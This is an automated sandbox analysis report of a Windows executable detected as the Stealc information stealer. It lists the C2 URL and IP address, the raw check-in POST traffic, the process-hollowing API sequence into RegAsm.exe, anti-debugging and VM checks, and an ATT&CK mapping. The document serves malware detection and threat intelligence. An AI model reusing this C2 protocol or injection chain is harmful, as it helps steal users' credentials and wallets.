Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1508192
MD5: 1a3ac0bc9af8e3b8cc72caaf6ba88b9f
SHA1: 885872fa24d22d8b9c118174ed3d7b7419e58fe0
SHA256: ab6d864f42680ad444f9a445d3e403cfd1a6355985db933611ec4cb7607b76bf
Tags: exe
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign process
Machine Learning detection for sample
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5076 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1A3AC0BC9AF8E3B8CC72CAAF6BA88B9F)
    • conhost.exe (PID: 4044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 3000 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://45.152.113.10/92335b4816f77e90.php"}
Source | Rule | Description | Author
00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 5076 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: RegAsm.exe PID: 3000 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: RegAsm.exe PID: 3000 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
          No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-09T20:33:59.230715+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49713 | 45.152.113.10 | 80 | TCP

          AV Detection

Source: http://45.152.113.10/92335b4816f77e90.php1MI | Avira URL Cloud: Label: malware
Source: http://45.152.113.10/m | Avira URL Cloud: Label: malware
Source: http://45.152.113.10/92335b4816f77e90.phpQM | Avira URL Cloud: Label: malware
Source: http://45.152.113.10/S | Avira URL Cloud: Label: malware
Source: http://45.152.113.10/92335b4816f77e90.php | Avira URL Cloud: Label: malware
Source: http://45.152.113.10/h | Avira URL Cloud: Label: malware
Source: http://45.152.113.10/92335b4816f77e90.phpyM | Avira URL Cloud: Label: malware
Source: http://45.152.113.10/yt | Avira URL Cloud: Label: malware
Source: http://45.152.113.10 | Avira URL Cloud: Label: malware
Source: http://45.152.113.10/ | Avira URL Cloud: Label: malware
Source: 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://45.152.113.10/92335b4816f77e90.php"}
Source: file.exe | ReversingLabs: Detection: 18%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49713 -> 45.152.113.10:80
Source: Malware configuration extractor | URLs: http://45.152.113.10/92335b4816f77e90.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1Host: 45.152.113.10Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /92335b4816f77e90.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECBHost: 45.152.113.10Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 44 32 44 41 38 46 46 42 44 34 31 30 36 38 35 34 30 37 36 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 2d 2d 0d 0a Data Ascii: ------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="hwid"84D2DA8FFBD41068540764------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="build"default------KJKKKJJJKJKFHJJJJECB--
Source: Joe Sandbox View | IP Address: 45.152.113.10 45.152.113.10
Source: Joe Sandbox View | ASN Name: CODECCLOUD-AS-APCodecCloudHKLimitedHK CODECCLOUD-AS-APCodecCloudHKLimitedHK
Source: unknown | TCP traffic detected without corresponding DNS query: 45.152.113.10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_004062D0 InternetOpenA,InternetConnectA,HttpSendRequestA,InternetReadFile,3_2_004062D0
Source: RegAsm.exe, 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10
Source: RegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/
Source: RegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2149282715.0000000001681000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/92335b4816f77e90.php
Source: RegAsm.exe, 00000003.00000002.2149282715.0000000001681000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/92335b4816f77e90.php1MI
Source: RegAsm.exe, 00000003.00000002.2149282715.0000000001681000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/92335b4816f77e90.phpQM
Source: RegAsm.exe, 00000003.00000002.2149282715.0000000001681000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/92335b4816f77e90.phpyM
Source: RegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/S
Source: RegAsm.exe, 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/h
Source: RegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/m
Source: RegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/yt
Source: RegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.101
Source: file.exe | String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: file.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe | String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: file.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.exe | String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe | String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe | String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe | String found in binary or memory: http://ocsp.entrust.net03
Source: file.exe | String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe | String found in binary or memory: http://www.entrust.net/rpa03
Source: file.exe | String found in binary or memory: https://www.entrust.net/rpa0

          System Summary

Source: file.exe, MoveAngles.cs | Large array initialization: MoveAngles: array initializer size 192000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00404610 appears 317 times
Source: file.exe | Static PE information: invalid certificate
Source: file.exe, 00000000.00000000.2131579112.0000000000624000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameVQP.exeX vs file.exe
Source: file.exe, 00000000.00000002.2135691458.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe | Binary or memory string: OriginalFilenameVQP.exeX vs file.exe
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@4/1@0/1
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
Source: C:\Users\user\Desktop\file.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4044:120:WilError_03
Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 18%
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0041BA2C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_0041BA2C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F70988 push ss; retn 5400h 0_2_00F70A6A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F704F1 pushad ; retn 0000h 0_2_00F704F2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F70978 push ss; retn 0000h 0_2_00F7097A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0291286C push ebp; ret 0_2_02912890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0041A9F5 push ecx; ret 3_2_0041AA08
Source: file.exe | Static PE information: section name: .text entropy: 7.9902895044889775
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Memory allocated: F70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe | Memory allocated: 2910000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe | Memory allocated: 4910000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe TID: 1268 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00401160 GetSystemInfo,3_2_00401160
Source: RegAsm.exe, 00000003.00000002.2149282715.000000000169D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWe
Source: RegAsm.exe, 00000003.00000002.2149282715.000000000169D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: RegAsm.exe, 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware+
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041ACFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00404610 VirtualProtect ?,00000004,00000100,00000000 3_2_00404610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00419160 mov eax, dword ptr fs:[00000030h] 3_2_00419160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00404610 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,3_2_00404610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0041C8D9 SetUnhandledExceptionFilter,3_2_0041C8D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041A718
Source: C:\Users\user\Desktop\file.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 5076, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3000, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02912439 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_02912439
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1063008
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_004172F0 GetUserNameA,3_2_004172F0
Source: file.exe, 00000000.00000002.2135691458.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avp.exe
Source: file.exe, 00000000.00000002.2135691458.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AVP.exe

          Stealing of Sensitive Information

Source: Yara match | File source: 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3000, type: MEMORYSTR

          Remote Access Functionality

Source: Yara match | File source: 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3000, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic in the report's column order; the number in parentheses is the figure the report shows beside a matched technique, entries without a number are the matrix's unmatched default cells)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (411); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (31); Process Injection (411); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (2); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery (31); Virtualization/Sandbox Evasion (31); Account Discovery (1); System Owner/User Discovery (1); System Information Discovery (12); Wi-Fi Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

Source | Detection | Scanner | Label
file.exe | 18% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label
http://45.152.113.10/92335b4816f77e90.php1MI | 100% | Avira URL Cloud | malware
http://45.152.113.10/m | 100% | Avira URL Cloud | malware
http://45.152.113.10/92335b4816f77e90.phpQM | 100% | Avira URL Cloud | malware
http://ocsp.entrust.net03 | 0% | Avira URL Cloud | safe
http://45.152.113.10/S | 100% | Avira URL Cloud | malware
http://45.152.113.10/92335b4816f77e90.php | 100% | Avira URL Cloud | malware
http://ocsp.entrust.net02 | 0% | Avira URL Cloud | safe
http://www.entrust.net/rpa03 | 0% | Avira URL Cloud | safe
http://aia.entrust.net/ts1-chain256.cer01 | 0% | Avira URL Cloud | safe
http://45.152.113.10/h | 100% | Avira URL Cloud | malware
http://45.152.113.101 | 0% | Avira URL Cloud | safe
http://45.152.113.10/92335b4816f77e90.phpyM | 100% | Avira URL Cloud | malware
http://45.152.113.10/yt | 100% | Avira URL Cloud | malware
http://crl.entrust.net/ts1ca.crl0 | 0% | Avira URL Cloud | safe
http://45.152.113.10 | 100% | Avira URL Cloud | malware
http://crl.entrust.net/2048ca.crl0 | 0% | Avira URL Cloud | safe
http://45.152.113.10/ | 100% | Avira URL Cloud | malware
https://www.entrust.net/rpa0 | 0% | Avira URL Cloud | safe
          No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://45.152.113.10/92335b4816f77e90.php | true | Avira URL Cloud: malware | unknown
http://45.152.113.10/ | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://45.152.113.10/S | RegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://ocsp.entrust.net03 | file.exe | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net02 | file.exe | false | Avira URL Cloud: safe | unknown
http://www.entrust.net/rpa03 | file.exe | false | Avira URL Cloud: safe | unknown
http://45.152.113.10/92335b4816f77e90.php1MI | RegAsm.exe, 00000003.00000002.2149282715.0000000001681000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://45.152.113.10/92335b4816f77e90.phpQM | RegAsm.exe, 00000003.00000002.2149282715.0000000001681000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://45.152.113.10/m | RegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://45.152.113.10/h | RegAsm.exe, 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://aia.entrust.net/ts1-chain256.cer01 | file.exe | false | Avira URL Cloud: safe | unknown
http://45.152.113.10/yt | RegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://45.152.113.10/92335b4816f77e90.phpyM | RegAsm.exe, 00000003.00000002.2149282715.0000000001681000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://45.152.113.10 | RegAsm.exe, 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://crl.entrust.net/ts1ca.crl0 | file.exe | false | Avira URL Cloud: safe | unknown
http://45.152.113.101 | RegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/2048ca.crl0 | file.exe | false | Avira URL Cloud: safe | unknown
